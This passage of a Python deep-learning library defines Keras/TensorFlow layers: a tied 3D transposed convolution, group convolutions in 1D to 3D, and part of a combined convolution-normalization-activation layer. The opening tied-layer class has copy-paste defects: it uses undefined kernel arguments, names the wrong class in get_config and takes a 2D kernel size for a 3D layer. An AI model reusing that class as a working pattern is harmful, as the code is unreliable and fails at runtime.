`depth` and `rows` and `cols` values might have changed due to padding.
"""
def __init__(self,
tied_layer='',
padding='valid',
output_padding=None,
activation=None,
use_bias=True,
bias_initializer='zeros',
bias_regularizer=None,
activity_regularizer=None,
bias_constraint=None,
varName='',
filters=None,
kernel_size=1,
strides=1,
data_format=None,
**kwargs):
# Reserved variables
if tied_layer != '':
self.kernelFrom = tied_layer.kernel.name
data_format = tied_layer.data_format
strides = tied_layer.strides
super(Conv3DTranspose, self).__init__(
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
activation=activations.get(activation),
use_bias=use_bias,
kernel_initializer=initializers.get(kernel_initializer),
bias_initializer=initializers.get(bias_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
self.output_padding = output_padding
if self.output_padding is not None:
self.output_padding = conv_utils.normalize_tuple(self.output_padding, 3, 'output_padding')
self.varName = varName
def build(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape)
if len(input_shape) != 5:
raise ValueError('Inputs should have rank 5, received input shape:', str(input_shape))
if self.data_format == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
if input_shape.dims[channel_axis].value is None:
raise ValueError('The channel dimension of the inputs '
'should be defined, found None: ' + str(input_shape))
input_dim = int(input_shape[channel_axis])
self.input_spec = InputSpec(ndim=5, axes={channel_axis: input_dim})
if self.varName == '':
kernelFrom = list(filter(lambda x:x.name==self.kernelFrom, [op for op in variables.global_variables(scope=None)]))[0]
else:
kernelFrom = list(filter(lambda x:x.name==self.varName, [op for op in variables.global_variables(scope=None)]))[0]
self.kernel = kernelFrom
# Save/Load information from tied layer (or database).
if self.varName == '':
kernel_shape = self.kernel.get_shape().as_list()
self.varName = kernelFrom.name
self.kernel_size = kernel_shape[:2]
self.filters = kernel_shape[2]
if self.output_padding is not None:
for stride, out_pad in zip(self.strides, self.output_padding):
if out_pad >= stride:
raise ValueError('Stride ' + str(self.strides) + ' must be '
'greater than output padding ' +
str(self.output_padding))
if self.use_bias:
self.bias = self.add_weight(
'bias',
shape=(self.filters,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
else:
self.bias = None
self.built = True
def get_config(self):
config = super(Conv2DTied, self).get_config()
config['varName'] = self.varName
config['tied_layer'] = ''
return config
class _GroupConv(Layer):
"""Abstract nD group convolution layer (private, used as implementation base).
This layer creates a convolution kernel that is convolved
(actually cross-correlated) with the layer input to produce a tensor of
outputs. If `use_bias` is True (and a `bias_initializer` is provided),
a bias vector is created and added to the outputs. Finally, if
`activation` is not `None`, it is applied to the outputs as well.
Different from trivial `Conv` layers, `GroupConv` divide the input channels into
several groups, and apply trivial convolution (or called dense convolution) to
each group. Inside each group, the convolution is trivial, however, between each
two groups, the convolutions are independent.
Arguments:
rank: An integer, the rank of the convolution, e.g. "2" for 2D convolution.
lgroups: Integer, the group number of the latent convolution branch. The
number of filters in the whole latent space is lgroups * lfilters.
lfilters: Integer, the dimensionality in each the lattent group (i.e. the
number of filters in each latent convolution branch).
kernel_size: An integer or tuple/list of n integers, specifying the
length of the convolution window.
strides: An integer or tuple/list of n integers,
specifying the stride length of the convolution.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: One of `"valid"`, `"same"`, or `"causal"` (case-insensitive).
data_format: A string, one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, ..., channels)` while `channels_first` corresponds to
inputs with shape `(batch, channels, ...)`.
dilation_rate: An integer or tuple/list of n integers, specifying
the dilation rate to use for dilated convolution.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any `strides` value != 1.
activation: Activation function. Set it to None to maintain a
linear activation.
use_bias: Boolean, whether the layer uses a bias.
kernel_initializer: An initializer for the convolution kernel.
bias_initializer: An initializer for the bias vector. If None, the default
initializer will be used.
kernel_regularizer: Optional regularizer for the convolution kernel.
bias_regularizer: Optional regularizer for the bias vector.
activity_regularizer: Optional regularizer function for the output.
kernel_constraint: Optional projection function to be applied to the
kernel after being updated by an `Optimizer` (e.g. used to implement
norm constraints or value constraints for layer weights). The function
must take as input the unprojected variable and must return the
projected variable (which must have the same shape). Constraints are
not safe to use when doing asynchronous distributed training.
bias_constraint: Optional projection function to be applied to the
bias after being updated by an `Optimizer`.
trainable: Boolean, if `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
name: A string, the name of the layer.
"""
def __init__(self, rank,
lgroups,
lfilters,
kernel_size,
strides=1,
padding='valid',
data_format=None,
dilation_rate=1,
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
trainable=True,
name=None,
**kwargs):
super(_GroupConv, self).__init__(
trainable=trainable,
name=name,
activity_regularizer=regularizers.get(activity_regularizer),
**kwargs)
self.rank = rank
self.lgroups = lgroups
self.lfilters = lfilters
self.kernel_size = conv_utils.normalize_tuple(
kernel_size, rank, 'kernel_size')
self.strides = conv_utils.normalize_tuple(strides, rank, 'strides')
self.padding = conv_utils.normalize_padding(padding)
if (self.padding == 'causal' and not isinstance(self, (Conv1D, SeparableConv1D))):
raise ValueError('Causal padding is only supported for `Conv1D` and ``SeparableConv1D`.')
self.data_format = conv_utils.normalize_data_format(data_format)
self.dilation_rate = conv_utils.normalize_tuple(
dilation_rate, rank, 'dilation_rate')
self.activation = activations.get(activation)
self.use_bias = use_bias
self.kernel_initializer = initializers.get(kernel_initializer)
self.bias_initializer = initializers.get(bias_initializer)
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.bias_regularizer = regularizers.get(bias_regularizer)
self.kernel_constraint = constraints.get(kernel_constraint)
self.bias_constraint = constraints.get(bias_constraint)
self.input_spec = InputSpec(ndim=self.rank + 2)
self.group_input_dim = None
def build(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape)
if self.data_format == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
if input_shape.dims[channel_axis].value is None:
raise ValueError('The channel dimension of the inputs should be defined. Found `None`.')
input_dim = int(input_shape[channel_axis])
if input_dim % self.lgroups != 0:
raise ValueError('To grouplize the input channels, the input channel number should be a multiple of group number (N*{0}), but given {1}'.format(self.lgroups, input_dim))
self.group_input_dim = input_dim // self.lgroups
kernel_shape = self.kernel_size + (self.group_input_dim, self.lfilters * self.lgroups)
self.kernel = self.add_weight(
name='kernel',
shape=kernel_shape,
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint,
trainable=True,
dtype=self.dtype)
if self.use_bias:
self.bias = self.add_weight(
name='bias',
shape=(self.lfilters * self.lgroups,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
else:
self.bias = None
self.input_spec = InputSpec(ndim=self.rank + 2, axes={channel_axis: input_dim})
if self.padding == 'causal':
op_padding = 'valid'
else:
op_padding = self.padding
# Create conv. op groups.
if self.data_format == 'channels_first':
group_input_shape = tensor_shape.TensorShape([input_shape[0], self.group_input_dim, *input_shape[2:]])
else:
group_input_shape = tensor_shape.TensorShape([*input_shape[:-1], self.group_input_dim])
group_kernel_shape = tensor_shape.TensorShape([*kernel_shape[:-1], self.lfilters])
self._convolution_op = nn_ops.Convolution(
group_input_shape,
filter_shape=group_kernel_shape,
dilation_rate=self.dilation_rate,
strides=self.strides,
padding=op_padding.upper(),
data_format=conv_utils.convert_data_format(self.data_format, self.rank + 2))
self.built = True
def call(self, inputs):
outputs_list = []
if self.data_format == 'channels_first':
for i in range(self.lgroups):
get_output = self._convolution_op(inputs[:,i*self.group_input_dim:(i+1)*self.group_input_dim, ...], self.kernel[..., i*self.lfilters:(i+1)*self.lfilters])
outputs_list.append(get_output)
outputs = array_ops.concat(outputs_list, 1)
else:
for i in range(self.lgroups):
get_output = self._convolution_op(inputs[..., i*self.group_input_dim:(i+1)*self.group_input_dim], self.kernel[..., i*self.lfilters:(i+1)*self.lfilters])
outputs_list.append(get_output)
outputs = array_ops.concat(outputs_list, -1)
if self.use_bias:
if self.data_format == 'channels_first':
if self.rank == 1:
# nn.bias_add does not accept a 1D input tensor.
bias = array_ops.reshape(self.bias, (1, self.lfilters * self.lgroups, 1))
outputs += bias
if self.rank == 2:
outputs = nn.bias_add(outputs, self.bias, data_format='NCHW')
if self.rank == 3:
# As of Mar 2017, direct addition is significantly slower than
# bias_add when computing gradients. To use bias_add, we collapse Z
# and Y into a single dimension to obtain a 4D input tensor.
outputs_shape = outputs.shape.as_list()
if outputs_shape[0] is None:
outputs_shape[0] = -1
outputs_4d = array_ops.reshape(outputs,
[outputs_shape[0], outputs_shape[1],
outputs_shape[2] * outputs_shape[3],
outputs_shape[4]])
outputs_4d = nn.bias_add(outputs_4d, self.bias, data_format='NCHW')
outputs = array_ops.reshape(outputs_4d, outputs_shape)
else:
outputs = nn.bias_add(outputs, self.bias, data_format='NHWC')
if self.activation is not None:
return self.activation(outputs)
return outputs
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape).as_list()
if self.data_format == 'channels_last':
space = input_shape[1:-1]
new_space = []
for i in range(len(space)):
new_dim = conv_utils.conv_output_length(
space[i],
self.kernel_size[i],
padding=self.padding,
stride=self.strides[i],
dilation=self.dilation_rate[i])
new_space.append(new_dim)
return tensor_shape.TensorShape([input_shape[0]] + new_space + [self.lfilters * self.lgroups])
else:
space = input_shape[2:]
new_space = []
for i in range(len(space)):
new_dim = conv_utils.conv_output_length(
space[i],
self.kernel_size[i],
padding=self.padding,
stride=self.strides[i],
dilation=self.dilation_rate[i])
new_space.append(new_dim)
return tensor_shape.TensorShape([input_shape[0], self.lfilters * self.lgroups] + new_space)
def get_config(self):
config = {
'lgroups': self.lgroups,
'lfilters': self.lfilters,
'kernel_size': self.kernel_size,
'strides': self.strides,
'padding': self.padding,
'data_format': self.data_format,
'dilation_rate': self.dilation_rate,
'activation': activations.serialize(self.activation),
'use_bias': self.use_bias,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'bias_initializer': initializers.serialize(self.bias_initializer),
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'activity_regularizer':
regularizers.serialize(self.activity_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'bias_constraint': constraints.serialize(self.bias_constraint)
}
base_config = super(_GroupConv, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def _compute_causal_padding(self):
"""Calculates padding for 'causal' option for 1-d conv layers."""
left_pad = self.dilation_rate[0] * (self.kernel_size[0] - 1)
if self.data_format == 'channels_last':
causal_padding = [[0, 0], [left_pad, 0], [0, 0]]
else:
causal_padding = [[0, 0], [0, 0], [left_pad, 0]]
return causal_padding
class GroupConv1D(_GroupConv):
"""1D group convolution layer (e.g. temporal group convolution).
This layer creates a convolution kernel that is convolved
with the layer input over a single spatial (or temporal) dimension
to produce a tensor of outputs.
Different from trivial `Conv` layers, `GroupConv` divide the input
channels into several groups, and apply trivial convolution (or called
dense convolution) to each group. Inside each group, the convolution is
trivial, however, between each two groups, the convolutions are independent.
If `use_bias` is True, a bias vector is created and added to the outputs.
Finally, if `activation` is not `None`,
it is applied to the outputs as well.
When using this layer as the first layer in a model,
provide an `input_shape` argument
(tuple of integers or `None`, e.g.
`(10, 128)` for sequences of 10 vectors of 128-dimensional vectors,
or `(None, 128)` for variable-length sequences of 128-dimensional vectors.
Arguments:
lgroups: Integer, the group number of the latent convolution branch. The
number of filters in the whole latent space is lgroups * lfilters.
lfilters: Integer, the dimensionality in each the lattent group (i.e. the
number of filters in each latent convolution branch).
kernel_size: An integer or tuple/list of a single integer,
specifying the length of the 1D convolution window.
strides: An integer or tuple/list of a single integer,
specifying the stride length of the convolution.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: One of `"valid"`, `"causal"` or `"same"` (case-insensitive).
`"causal"` results in causal (dilated) convolutions, e.g. output[t]
does not depend on input[t+1:]. Useful when modeling temporal data
where the model should not violate the temporal order.
See [WaveNet: A Generative Model for Raw Audio, section
2.1](https://arxiv.org/abs/1609.03499).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
dilation_rate: an integer or tuple/list of a single integer, specifying
the dilation rate to use for dilated convolution.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any `strides` value != 1.
activation: Activation function to use.
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
kernel_initializer: Initializer for the `kernel` weights matrix.
bias_initializer: Initializer for the bias vector.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation")..
kernel_constraint: Constraint function applied to the kernel matrix.
bias_constraint: Constraint function applied to the bias vector.
Input shape:
3D tensor with shape: `(batch_size, steps, input_dim)`
Output shape:
3D tensor with shape: `(batch_size, new_steps, filters)`
`steps` value might have changed due to padding or strides.
"""
def __init__(self,
lgroups,
lfilters,
kernel_size,
strides=1,
padding='valid',
data_format='channels_last',
dilation_rate=1,
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
super(GroupConv1D, self).__init__(
rank=1,
lgroups=lgroups,
lfilters=lfilters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
activation=activations.get(activation),
use_bias=use_bias,
kernel_initializer=initializers.get(kernel_initializer),
bias_initializer=initializers.get(bias_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
def call(self, inputs):
if self.padding == 'causal':
inputs = array_ops.pad(inputs, self._compute_causal_padding())
return super(GroupConv1D, self).call(inputs)
class GroupConv2D(_GroupConv):
"""2D group convolution layer (e.g. spatial group convolution over images).
This layer creates a convolution kernel that is convolved
with the layer input to produce a tensor of outputs.
Different from trivial `Conv` layers, `GroupConv` divide the input
channels into several groups, and apply trivial convolution (or called
dense convolution) to each group. Inside each group, the convolution is
trivial, however, between each two groups, the convolutions are independent.
If `use_bias` is True, a bias vector is created and added to the outputs.
Finally, if `activation` is not `None`, it is applied to the outputs as well.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 3)` for 128x128 RGB pictures
in `data_format="channels_last"`.
Arguments:
lgroups: Integer, the group number of the latent convolution branch. The
number of filters in the whole latent space is lgroups * lfilters.
lfilters: Integer, the dimensionality in each the lattent group (i.e. the
number of filters in each latent convolution branch).
kernel_size: An integer or tuple/list of 2 integers, specifying the
height and width of the 2D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 2 integers,
specifying the strides of the convolution along the height and width.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: one of `"valid"` or `"same"` (case-insensitive).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
dilation_rate: an integer or tuple/list of 2 integers, specifying
the dilation rate to use for dilated convolution.
Can be a single integer to specify the same value for
all spatial dimensions.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any stride value != 1.
activation: Activation function to use.
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
kernel_initializer: Initializer for the `kernel` weights matrix.
bias_initializer: Initializer for the bias vector.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation")..
kernel_constraint: Constraint function applied to the kernel matrix.
bias_constraint: Constraint function applied to the bias vector.
Input shape:
4D tensor with shape:
`(samples, channels, rows, cols)` if data_format='channels_first'
or 4D tensor with shape:
`(samples, rows, cols, channels)` if data_format='channels_last'.
Output shape:
4D tensor with shape:
`(samples, filters, new_rows, new_cols)` if data_format='channels_first'
or 4D tensor with shape:
`(samples, new_rows, new_cols, filters)` if data_format='channels_last'.
`rows` and `cols` values might have changed due to padding.
"""
def __init__(self,
lgroups,
lfilters,
kernel_size,
strides=(1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1),
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
super(GroupConv2D, self).__init__(
rank=2,
lgroups=lgroups,
lfilters=lfilters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
activation=activations.get(activation),
use_bias=use_bias,
kernel_initializer=initializers.get(kernel_initializer),
bias_initializer=initializers.get(bias_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
class GroupConv3D(_GroupConv):
"""3D group convolution layer (e.g. spatial group convolution over volumes).
This layer creates a convolution kernel that is convolved
with the layer input to produce a tensor of outputs.
Different from trivial `Conv` layers, `GroupConv` divide the input
channels into several groups, and apply trivial convolution (or called
dense convolution) to each group. Inside each group, the convolution is
trivial, however, between each two groups, the convolutions are independent.
If `use_bias` is True, a bias vector is created and added to the outputs.
Finally, if `activation` is not `None`, it is applied to the outputs as well.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 128, 1)` for 128x128x128 volumes
with a single channel,
in `data_format="channels_last"`.
Arguments:
lgroups: Integer, the group number of the latent convolution branch. The
number of filters in the whole latent space is lgroups * lfilters.
lfilters: Integer, the dimensionality in each the lattent group (i.e. the
number of filters in each latent convolution branch).
kernel_size: An integer or tuple/list of 3 integers, specifying the
depth, height and width of the 3D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 3 integers,
specifying the strides of the convolution along each spatial
dimension.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: one of `"valid"` or `"same"` (case-insensitive).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, spatial_dim1, spatial_dim2, spatial_dim3, channels)`
while `channels_first` corresponds to inputs with shape
`(batch, channels, spatial_dim1, spatial_dim2, spatial_dim3)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
dilation_rate: an integer or tuple/list of 3 integers, specifying
the dilation rate to use for dilated convolution.
Can be a single integer to specify the same value for
all spatial dimensions.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any stride value != 1.
activation: Activation function to use.
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
kernel_initializer: Initializer for the `kernel` weights matrix.
bias_initializer: Initializer for the bias vector.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation")..
kernel_constraint: Constraint function applied to the kernel matrix.
bias_constraint: Constraint function applied to the bias vector.
Input shape:
5D tensor with shape:
`(samples, channels, conv_dim1, conv_dim2, conv_dim3)` if
data_format='channels_first'
or 5D tensor with shape:
`(samples, conv_dim1, conv_dim2, conv_dim3, channels)` if
data_format='channels_last'.
Output shape:
5D tensor with shape:
`(samples, filters, new_conv_dim1, new_conv_dim2, new_conv_dim3)` if
data_format='channels_first'
or 5D tensor with shape:
`(samples, new_conv_dim1, new_conv_dim2, new_conv_dim3, filters)` if
data_format='channels_last'.
`new_conv_dim1`, `new_conv_dim2` and `new_conv_dim3` values might have
changed due to padding.
"""
def __init__(self,
lgroups,
lfilters,
kernel_size,
strides=(1, 1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1, 1),
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
super(GroupConv3D, self).__init__(
rank=3,
lgroups=lgroups,
lfilters=lfilters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
activation=activations.get(activation),
use_bias=use_bias,
kernel_initializer=initializers.get(kernel_initializer),
bias_initializer=initializers.get(bias_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
class _AConv(Layer):
"""Modern convolutional layer.
Abstract nD convolution layer (private, used as implementation base).
`_AConv` implements the operation:
`output = activation( normalization( conv(x, W), gamma, beta ), alpha )`
This layer is a stack of convolution, normalization and activation.
As an extension, we allow users to use activating layers with parameters
like PRelu.
Arguments for convolution:
rank: An integer, the rank of the convolution, e.g. "2" for 2D convolution.
filters: Integer, the dimensionality of the output space (i.e. the number
of filters in the convolution).
kernel_size: An integer or tuple/list of n integers, specifying the
length of the convolution window.
strides: An integer or tuple/list of n integers,
specifying the stride length of the convolution.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
lgroups: Latent group number of group convolution. Only if set, use group
convolution. The latent filter number of group convolution would
be inferred by lfilters = filters // lgroups. Hence, filters should
be a multiple of lgroups.
padding: One of `"valid"`, `"same"`, or `"causal"` (case-insensitive).
data_format: A string, one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, ..., channels)` while `channels_first` corresponds to
inputs with shape `(batch, channels, ...)`.
dilation_rate: An integer or tuple/list of n integers, specifying
the dilation rate to use for dilated convolution.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any `strides` value != 1.
kernel_initializer: An initializer for the convolution kernel.
kernel_regularizer: Optional regularizer for the convolution kernel.
kernel_constraint: Optional projection function to be applied to the
kernel after being updated by an `Optimizer` (e.g. used to implement
norm constraints or value constraints for layer weights). The function
must take as input the unprojected variable and must return the
projected variable (which must have the same shape). Constraints are
not safe to use when doing asynchronous distributed training.
trainable: Boolean, if `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
name: A string, the name of the layer.
Arguments for normalization:
normalization: The normalization type, which could be
(1) None: do not use normalization and do not add biases.
(2) bias: apply biases instead of using normalization.
(3) batch: use batch normalization.
(4) inst : use instance normalization.
(5) group: use group normalization.
If using (2), the initializer, regularizer and constraint for
beta would be applied to the bias of convolution.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: Optional constraint for the beta weight.
gamma_constraint: Optional constraint for the gamma weight.
groups (only for group normalization): Integer, the number of
groups for Group Normalization.
Can be in the range [1, N] where N is the input dimension.
The input dimension must be divisible by the number of groups.
Arguments for activation:
activation: Activation function to use
(see [activations](../activations.md)).
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
activity_config: keywords for the parameters of activation
function (only for lrelu).
Arguments (others):
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
(see [regularizer](../regularizers.md)).
"""
def __init__(self, rank,
filters,
kernel_size,
strides=1,
lgroups=None,
padding='valid',
data_format=None,
dilation_rate=1,
kernel_initializer='glorot_uniform',
kernel_regularizer=None,
kernel_constraint=None,
normalization='inst',
beta_initializer='zeros',
gamma_initializer='ones',
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
groups=32,
activation=None,
activity_config=None,
activity_regularizer=None,
trainable=True,
name=None,
_high_activation=None,
**kwargs):
if 'input_shape' not in kwargs and 'input_dim' in kwargs:
kwargs['input_shape'] = (kwargs.pop('input_dim'),)
super(_AConv, self).__init__(trainable=trainable, name=name, activity_regularizer=regularizers.get(activity_regularizer), **kwargs)
# Inherit from keras.layers._Conv
self.rank = rank
self.filters = filters
self.lgroups = lgroups
if (lgroups is not None) and (lgroups > 1):
if filters % lgroups != 0:
raise ValueError('To grouplize the output channels, the output channel number should be a multiple of group number (N*{0}), but given {1}'.format(self.lgroups, self.filters))
self.kernel_size = conv_utils.normalize_tuple(
kernel_size, rank, 'kernel_size')
self.strides = conv_utils.normalize_tuple(strides, rank, 'strides')
self.padding = conv_utils.normalize_padding(padding)
if (self.padding == 'causal' and not isinstance(self, AConv1D)):
raise ValueError('Causal padding is only supported for `AConv1D`.')
self.data_format = conv_utils.normalize_data_format(data_format)
self.dilation_rate = conv_utils.normalize_tuple(
dilation_rate, rank, 'dilation_rate')
self.kernel_initializer = initializers.get(kernel_initializer)
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.kernel_constraint = constraints.get(kernel_constraint)
# Inherit from mdnt.layers.normalize
self.normalization = normalization
if isinstance(normalization, str) and normalization in ('batch', 'inst', 'group'):
self.use_bias = False
self.gamma_initializer = initializers.get(gamma_initializer)
self.gamma_regularizer = regularizers.get(gamma_regularizer)
self.gamma_constraint = constraints.get(gamma_constraint)
elif normalization:
self.use_bias = True
self.gamma_initializer = None
self.gamma_regularizer = None
self.gamma_constraint = None
else:
self.use_bias = False
self.gamma_initializer = None
self.gamma_regularizer = None
self.gamma_constraint = None
self.beta_initializer = initializers.get(beta_initializer)
self.beta_regularizer = regularizers.get(beta_regularizer)
self.beta_constraint = constraints.get(beta_constraint)
self.groups = groups
# Inherit from keras.engine.Layer
if _high_activation is not None:
activation = _high_activation
self.high_activation = _high_activation
self.use_plain_activation = False
if isinstance(activation, str) and (activation.casefold() in ('prelu','lrelu')):
self.activation = activations.get(None)
self.high_activation = activation.casefold()
self.activity_config = activity_config # dictionary passed to activation
if activity_config is None:
self.activity_config = dict()
elif activation is not None:
self.use_plain_activation = True
self.activation = activations.get(activation)
self.activity_config = None
else:
self.activation = activations.get(None)
self.activity_config = None
self.trainable = trainable
self.input_spec = InputSpec(ndim=self.rank + 2)
def build(self, input_shape):
if self.data_format == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
if self.use_bias:
bias_initializer = self.beta_initializer
bias_regularizer = self.beta_regularizer
bias_constraint = self.beta_constraint
else:
bias_initializer = None
bias_regularizer = None
bias_constraint = None
if (self.lgroups is not None) and (self.lgroups > 1):
self.layer_conv = _GroupConv(rank=self.rank,
lgroups=self.lgroups,
lfilters=self.filters // self.lgroups,
kernel_size=self.kernel_size,
strides=self.strides,
padding=self.padding,
data_format=self.data_format,
dilation_rate=self.dilation_rate,
activation=None,
use_bias=self.use_bias,
bias_initializer=bias_initializer,
bias_regularizer=bias_regularizer,
bias_constraint=bias_constraint,
kernel_initializer=self.kernel_initializer,
kernel_regularizer=self.kernel_regularizer,
kernel_constraint=self.kernel_constraint,
trainable=self.trainable)
else:
self.layer_conv = Conv(rank=self.rank,
filters=self.filters,
kernel_size=self.kernel_size,
strides=self.strides,
padding=self.padding,
data_format=self.data_format,
dilation_rate=self.dilation_rate,
activation=None,
use_bias=self.use_bias,
bias_initializer=bias_initializer,
bias_regularizer=bias_regularizer,
bias_constraint=bias_constraint,
kernel_initializer=self.kernel_initializer,
kernel_regularizer=self.kernel_regularizer,
kernel_constraint=self.kernel_constraint,
trainable=self.trainable)
self.layer_conv.build(input_shape)
compat.collect_properties(self, self.layer_conv) # for compatibility
next_shape = self.layer_conv.compute_output_shape(input_shape)
if self.normalization and (not self.use_bias):
if self.normalization.casefold() == 'batch':
self.layer_norm = BatchNormalization(axis=channel_axis,
gamma_initializer=self.gamma_initializer,
gamma_regularizer=self.gamma_regularizer,
gamma_constraint=self.gamma_constraint,
beta_initializer=self.beta_initializer,
beta_regularizer=self.beta_regularizer,
beta_constraint=self.beta_constraint,
trainable=self.trainable)
elif self.normalization.casefold() == 'inst':
self.layer_norm = InstanceNormalization(axis=channel_axis,
gamma_initializer=self.gamma_initializer,
gamma_regularizer=self.gamma_regularizer,
gamma_constraint=self.gamma_constraint,
beta_initializer=self.beta_initializer,
beta_regularizer=self.beta_regularizer,
beta_constraint=self.beta_constraint,
trainable=self.trainable)
elif self.normalization.casefold() == 'group':
self.layer_norm = GroupNormalization(axis=channel_axis, groups=self.groups,
gamma_initializer=self.gamma_initializer,
gamma_regularizer=self.gamma_regularizer,
gamma_constraint=self.gamma_constraint,
beta_initializer=self.beta_initializer,
beta_regularizer=self.beta_regularizer,
beta_constraint=self.beta_constraint,
trainable=self.trainable)
self.layer_norm.build(next_shape)
